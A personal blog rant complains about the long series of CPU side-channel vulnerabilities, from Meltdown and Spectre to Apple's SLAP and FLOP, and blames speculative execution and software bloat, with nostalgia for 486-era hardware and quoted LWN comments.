I am sick of the endless string of vulnerabilities because of CPU design flaws. A recent sampler: Meltdown (2018), Spectre (v1, v2, v3, v4, v5, and SpectreRSB in 2018, SWAPGS in 2019, Spectre-STC in 2020, Spectre SRV aka v6 in 2023), Foreshadow (2018), ZombieLoad (2019), RIDL (2019), Fallout (2019), LazyFP (2018), TSX Asynchronous Abort (2019), CacheOut (2020), Retbleed (2022), ÆPIC Leak (2022), Hertzbleed (2022), SQUIP (2022), Downfall (2023), Zenbleed (2023), Inception (2023), Collateral Damage (2023), GhostRace (2023). Of course, the most mediatized were Meltdown and Spectre: they actually made the population aware that microprocessors are inherently vulnerable. No need for the dumb user to run some malware; and no way to fix any such vulnerability unless microcode updates are issued and applied, firmware patches are issued and applied, or software workarounds are developed at the OS level, but some (especially the software workarounds) have performance penalties as a trade-off.

Most such vulnerabilities affected specifically Intel’s CPUs (Foreshadow, ZombieLoad, TSX Asynchronous Abort, Downfall, ÆPIC Leak), some are specific to AMD (SQUIP, Zenbleed, Inception), while some concern both platforms (Spectre v1, v2, v4, Retbleed, Hertzbleed, partially Meltdown).

And now, even Apple’s own ARM CPUs are doomed!

I first read about this issue on BleepingComputer: New Apple CPU side-channel attacks steal data from browsers. These vulnerabilities are called SLAP and FLOP, and are described in more detail on predictors.fail (because they do!), where you’ll find two dozen links to articles on the web about SLAP and FLOP.

What you need to know:

The affected Apple devices are the following:

  • All Mac laptops from 2022-present (MacBook Air, MacBook Pro)
  • All Mac desktops from 2023-present (Mac Mini, iMac, Mac Studio, Mac Pro)
  • All iPad Pro, Air, and Mini models from September 2021-present (Pro 6th and 7th gen., Air 6th gen., Mini 6th gen.)
  • All iPhones from September 2021-present (All 13, 14, 15, and 16 models, SE 3rd gen.)

What you also need to know:

  • BleepingComputer: “Until security updates from Apple are made available, a possible mitigation would be to turn off JavaScript in Safari and Chrome, though this will expectedly break many websites.”
  • From the only comment on the same site: “Safari doesn’t have functional process & site isolation so it’s vulnerable. Chrome and Firefox do. Of those two, Firefox has the stronger implementation as they learned from Chrome’s mistakes. Sometimes there’s a benefit to being fashionably late after observing the mistakes the rushed arrivals make. On the other hand, it’s better to be late than never making it to the party at all, Safari.”

Apple might, or might not, issue fixes in a reasonable timeframe. There are quite some devices that are affected!

I couldn’t be bothered to understand the exact aspects of SLAP and FLOP, so I can’t tell whether the fixes are easy or close to impossible. I also don’t know how performance would be impacted. Judging by the previous CPU vulnerabilities, everything can happen. For instance, updating the microcode to patch Downfall significantly reduced the performance of some heavily-vectorized loads (and AVX extensions need to be entirely disabled in the kernel on the CPUs for which microcode mitigation is not available); the mitigation of Meltdown was even trickier (under Linux, kernel page-table isolation (KPTI) has led to a reduction in CPU performance; macOS, iOS, Safari and all the supported Windows versions needed mitigation measures, with some AMD systems having booting issues afterwards).

The root cause of all this is GREED. And the action mechanism is EXCESSIVE DESIGN COMPLEXITY. The same way Linus Torvalds himself admitted that no single person can truly understand how the Linux kernel works (speaking of complexity, the Linux kernel has just surpassed 40 million lines of code), no single person can truly understand how a modern CPU works. But we need the CPUs to run the code AS FAST AS POSSIBLE, so that poorly-written software can behave acceptably! And the same way ALL SOFTWARE currently in use has a HUGE NUMBER of unfixed bugs, the hardware is bug-ridden because of its OUT-OF-CONTROL complexity. Welcome to the 21st century!

Why is it that I call this “greed”?

Well, because such vulnerabilities only appeared once concepts such as the following ones began being applied to the design of CPUs: Speculative Execution, Branch Prediction, Out-of-Order Execution, and Load Value Prediction.

Modern CPUs dedicate an immense amount of logic and circuitry not to directly execute code but to prepare, predict, optimize, and parallelize its execution. Not counting the L1/L2/L3 cache, which can take ~30-60% of the die, the remaining core is used as follows:

  • ~20-30% is dedicated to the Execution Units that handle the actual computations (arithmetic, logic, memory access, etc.).
  • ~50-70% is dedicated to the Instruction Optimizers (prediction tables, reservation stations, reorder buffers, and scheduling logic).

Unsurprisingly, ALL CPU vulnerabilities reside in the bloody Instruction Optimizers! On a modern CPU, only 10-20% of the cycles are executed in-order!

Branch prediction with speculative execution first appeared in x86-class CPUs with the introduction of the Intel Pentium Pro in 1995. The first-generation Pentium (P5), released in 1993, also included a very basic form of branch prediction, but without speculative execution. The last x86-class CPU without branch prediction was the Intel 80486 (i486), first released in 1989.

I really, really was very happy with the CPUs of that era, used to run the software of the same period. Intel’s 80486DX4 went up to 100 MHz, while AMD’s Am486 DX4-120 ran at, obviously, 120 MHz (in 1995). AMD’s Am5x86-P75 ran at 133 MHz (it was a 486-class CPU equivalent in performance with a P5 at 75 MHz), and Am5x86-P100 ran at 160 MHz. On the cheaper side, there was the beloved Cyrix (a company that offered really affordable x86 clones, despite the deceptive names: 486SLC and 486DLC, despite their names, were pin-compatible with the 386SX and DX): Cyrix Cx5x86 (486 Socket 3) ran at up to 120 MHz, and IBM’s 5x86C was a rebranding of it (IBM’s other rebrands of Cyrix that included “486” in name were 386-class CPUs using 386 sockets, but with some 486-class features).

Back then, which means before 1995 and not much after, believe it or not, there was plenty of useful and deeply satisfying software written for MS-DOS, Windows 3.1 and Windows for Workgroups 3.11, and eventually for Windows 95. And they ran on unbelievably low-spec hardware!

Nowadays CPUs not only have frequencies of, say, 4 GHz compared to 100 MHz, but due to the improved architecture, their performance is much higher than the frequency ratio. Say, not 40 times better, but maybe 500 times better. But if you were to compare the speed of opening a visual desktop and a text editor or a document editor on the following two levels of hardware, it’s not much faster now!

  • an i486-class CPU at 100 MHz, with 8 to 16 MB or RAM, running Windows 3.1, WfW 3.11, Win95, or the Linux distros available back then (or FreeBSD, NetBSD);
  • a modern CPU that can reach 2.5-4 GHz, with 8 to 16 GB of RAM, meaning 1,000x the RAM and a CPU that could perform ~500x better!

Such a CPU can perform much better than the frequency ratio because of its improved architecture, huge L1/L2/L3 cache and… Speculative Execution, Branch Prediction, Out-of-Order Execution, and Load Value Prediction! And yet, the computer doesn’t necessarily feel lightning fast, does it?

This phenomenon is often referred to as “software bloat” or “Wirth’s Law,” which humorously states: “Software gets slower more rapidly than hardware gets faster.” Or, with Niklaus Wirth’s exact words, “The hope is that the progress in hardware will cure all software ills. However, a critical observer may observe that software manages to outgrow hardware in size and sluggishness.

That’s because modern operating systems and applications:

  • rely on multiple layers of abstraction (APIs, frameworks, virtual machines);
  • implement security by using sandboxing and other isolation mechanisms;
  • are often written in higher-level languages that are anything but fast to execute (including JavaScript and Python);
  • use frameworks and libraries that prioritize developer productivity over runtime efficiency;
  • are released quickly rather than thoroughly tested, especially as testing is increasingly difficult due to the architectural complexity;
  • are utterly bloated and inefficient!

Case in point:

  • Windows 95 required 4 MB of RAM to run, while Windows 11 recommends 4 GB at the very least.
  • A contemporary web browser can easily use 1-2 GB of RAM to render a few tabs, because the web content nowadays is not limited to HTML, CSS, images, and videos, but it consists mainly of shitloads of crappy JavaScript!

I used a PC exactly like the one below, with 80386SX/20 but only 1 MB of RAM (the hardware wasn’t cheap back then!), to run MS-DOS and Windows 3.1 (in Standard mode) impeccably! (Other than the occasional blue screens, because when an app or a driver crashed, the entire OS crashed.) 2 MB of RAM allowed Windows 3.1 to run in Enhanced mode. 4 MB of RAM opened the door to Windows 95, Slackware 3.0, FreeBSD 2.0, NetBSD 1.0.

I have to admit, though, that my first laptop, the entry-level HP OmniBook XE3, had a Celeron at 550 MHz (100 MHz FSB) and 64 MB of RAM. Way too much for Windows 98 SE!

When the Downfall CPU vulnerability was discovered in 2023, some people commented on LWN.net:

● Can we please just go back to Z80s and CP/M please thank you.

● I’ll have RISC-V instead, thank you very much.

● No good, pipelines and speculative stuff, just plain cycle-by-cycle normality.

● This is why I want my Z80 back.

● We know how non-speculative CPUs perform on modern manufacturing processes. The ARM Cortex-520 is in-order and the performance is not amazing. Similarly, Intel released the Quark a few years ago (port of the 486 to a modern process).

You wouldn’t be happy with a non-speculative CPU in your phone, let alone your laptop, desktop or server.

● I was perfectly happy on my MicroBee in 1984, I could be just as happy now.

● I’m still using a phone from 2011 and a netbook from 2009. Second and third battery (soon to be 4th 🙂

And maybe I’m not happy with having to wait a few seconds to switch apps, or the fact that Firefox no longer works on the phone because the CEO fired all the engineers to buy a 10th mansion, but I know I wouldn’t be any happier buying into the “10 copies of chrome and they all want to infantilise you and pick your pocket” way of life. Everyone there seems to be miserable.

● Maybe all this speculative execution stuff is a response software and chip design going down a wrong path and chasing a local minimum at the top of a mountain …

From what I can make out, modern CPUs are “C language execution machines”, and C is written to take advantage of all these features with optimisation code up the wazoo.

Get rid of all this optimisation code, get rid of all this speculative silicon, start from scratch with sane languages and chips …

Sorry to get on the database bandwagon again, but I would love to go back 20 years, when I worked with databases that had snappy response times on systems with the hard disk going nineteen to the dozen. Yes the programmer actually has to THINK about their database design, but the result is a database that can start spewing results instantly the programmer SENDS the query, and a database that can FINISH the query faster than an RDBMS can optimise it …

Modern development techniques for web applications in particular have contributed to making application response time much worse than it used to be and orders of magnitude beyond what it was on much slower systems forty years ago. Wondering what went wrong and why no one seems to care if their page takes five or ten seconds to update is a relevant inquiry.

● Everyone is trying to solve their own tiny, insignificant task. And the fact that when all these non-solutions to non-problems, when combined, create something awful… who may even notice that, let alone fix that? Testers? They are happy if they have time to look on the pile of pointless non-problems in the bugtracker! Users? They are not the ones who pay for the software novadays. Advertisers do that and they couldn’t care less about what users experience.

● You have to speculate heavily to get high single-thread performance, and single-thread performance will always matter because of Amdahl’s Law.

Some people commenting here claim they’d be happy with much lower performance. That’s fine, but most people find some Web sites and phone apps useful, and those need high single-thread performance.

● Nope. Not even close. Web sites would be equally sluggish no matter how many speculations your CPU does simply because there are no one who may care to make them fast.

If speculations would have been outlawed 10 or 20 years ago and all we had would have been fully in-order 80486 100MHz… they would have worked with precisely the same speed they work today on 5GHz CPUs.

The trick is that it’s easy to go from sluggish website on 80486 100MHz device to sluggish web site on 5GHz device, but it’s not clear how you can go back and if that’s even possible at all.

● My computer is idle waiting for user input 99% of the time. I might be happy with a slower, non-speculative CPU for most use. High-performance code for gaming or video decoding (or perhaps a kernel compile) can be explicitly tagged as less sensitive, and scheduled on a separate high-performance core. Indeed, CPU-intensive stuff is nowadays becoming GPU-intensive instead. It’s possible that in ten years, with number-crunching offloaded to the GPU, the evolutionary niche for big, superscalar CPUs will disappear.

If only it could speculatively run all that Javascript in anticipation of you clicking the button.

● All of these vulnerabilities exist because we have shared state in the hardware between two threads with different access rights; how far away is a world where we can afford to let some CPU cores be near-idle so that threads with different access rights don’t share state?

In theory, the CPU designers could fix this by tagging state so that different threads (identified to the CPU by PCID and privilege level) don’t share state, and by making sure that the partitioning of state tables between different threads changes slowly.

And also in theory, we could fix this in software by hard-flushing all core state at the beginning and end of each context switch that changes access rights (including user mode to kernel mode and back). However, this sort of state flushing is expensive on modern CPUs, because of the sheer quantity of state (branch predictors, caches, store buffers, load queues, and more).

Which leaves just isolation as the fix for high-performance systems; with enough CPU cores, you can afford the expensive state flush when a core switches access rights, and you can use message passing (e.g. io_uring) to ask a different core to do operations on your behalf.

● My laptop has over 500 tasks running, many of them for only short periods before going to sleep. My phone has similarly large numbers of tasks.

We don’t yet have thousands of cores, so we can’t simply assign each task to a core; we thus need to work out how to avoid having (e.g.) kernel threads and user threads sharing the same state. And note that because some state is outside the core (L2 cache, for example), it’s not just a case of “don’t share cores – neither sequentially nor concurrently” – depending on the paranoia level, you might want to reduce shared state further than that.

OK, so we’re doomed. (“OK, Boomer!”)

The irony is that Apple’s vulnerable CPUs are ARM, hence CISC, not RISC. Progress means sometimes to go back to older principles. (Back in the day, the migration was from RISC to CISC, not the other way around.) But wait, shouldn’t in principle RISC CPUs be less prone to such bugs than CISC CPUs?

Umm, no. Apple’s M3, M4, and A17 Pro CPUs are highly complex and “optimized for performance,” which can (and will!) introduce security risks. While RISC architectures were originally designed to be simpler than CISC architectures like x86, the reality is that modern RISC CPUs include many of the same performance-enhancing features (speculative execution, branch prediction, out-of-order execution, load value prediction) that make them susceptible to similar vulnerabilities.

But this CPU madness that leads to such vulnerabilities is nothing compared to the GPU madness! Gen Z can’t possibly know, because they’re the generation that uses water-cooled or nitrogen-cooled video cards. Why, because insane arrays of GPUs are increasingly “needed” not for games, not for graphics or video processing, but for crypto mining or for running LLM AI engines locally!

Around 1990 and through 1995, most video cards were little more than double-buffers for the VRAM used to display the image! They were essentially framebuffer devices with limited acceleration capabilities. Any complex calculations, such as transformations, shading, or even simple 2D rendering, were primarily handled by the CPU (and FPU, if present). And, I’m sorry to say, but there were many fabulous MS-DOS games able to run with a VGA or VESA card having 256 KB (yeah, that’s KB) and no GPU in the modern meaning of the term! At best, high-end 2D graphics cards (like those from Tseng Labs, ATI, S3, or Matrox) included basic BitBLT (bit block transfer) acceleration, line drawing, and some hardware-assisted text and GUI operations to speed up Windows and DOS applications. But full-on graphics processing as we think of it today was still a few years away.

What people are doing with both hardware and software these days can be described as the work of a sorcerer’s apprentice:

Person who experiments carelessly, without paying attention to the possible consequences of their experiments and without the ability to contain them should they spiral out of control.

Or, as the French put it, jouer à l’apprenti-sorcier ― to play God.

Stick your fucking stupid hardware and software up your asses!